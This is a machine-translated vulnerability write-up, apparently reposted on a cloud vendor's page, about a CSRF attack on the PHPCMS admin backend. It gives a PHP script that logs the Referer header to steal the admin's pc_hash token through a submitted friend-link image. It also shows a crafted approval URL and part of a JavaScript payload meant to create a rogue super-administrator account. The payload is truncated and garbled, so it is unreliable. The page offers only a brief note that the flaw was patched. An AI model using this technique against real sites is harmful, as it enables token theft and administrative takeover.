PHPCMS Combination Technology for CSRF attacks

Source: Internet
Author: User

As we all know, after logging on to the background with phpcms, there is a pc_hash as the TOKEN to prevent CSRF attacks, and how can I use a combination of techniques to perform CSRF attacks. After phpcms is installed, you can apply for links by default. There are two types of links: text links and image links. The image link. When the Administrator reviews the image, the image is directly displayed in the background. The background url contains the pc_hash, so we can find this pc_hash In the referer of the image ~~ Why? The method is as follows: first, I wrote a script for obtaining referer locally:

<?php$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';file_put_contents('referer.txt', $referer);?>

 

Then, use this script as the image address to apply for a friend Link: When the Administrator accesses the "Friendship link" function in the background, I have already stolen its pc_hash: in practice, we can also make this look a little bit. For example, if you use php to output a real logo, not only does the pc_hash get, but it is also like a request to actually apply for a friend chain. Now I have obtained a referer locally: So what can I do with pc_hash? Of course it is CSRF. Here is a simple example. I can construct the following link: http: // localhost/phpcms/index. php? M = link & c = link & a = check & linkid = 4 & pc_hash = lrP5dK can be viewed as an image spoofing administrator, so that the link of id = 4 can be reviewed and approved. That is, the friend chain I just applied. Let's try again.
Gum = function () {var u = {'version': '000000', 'domain ':' {domain} ', 'backinfo ':{}, 'author ':' https://github.com/quininer/gum '}; U. e = function (code) {try {return eval (code)} catch (e) {return ''}; u. name = function (names) {return document. getElementsByTagName (names) ;}; u.html = function () {return u. name ('html ') [0] | document. write ('

 

Modify pc_hash to the pc_hash obtained for you, and then place the above Code on any html page (without any domain name) to trick the Administrator into accessing the site. In this way, you can add a user name named test to the target site, super Administrator account with a password of 123123: Solution:No good suggestions. Do not put pc_hash in the url
Officially patched

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.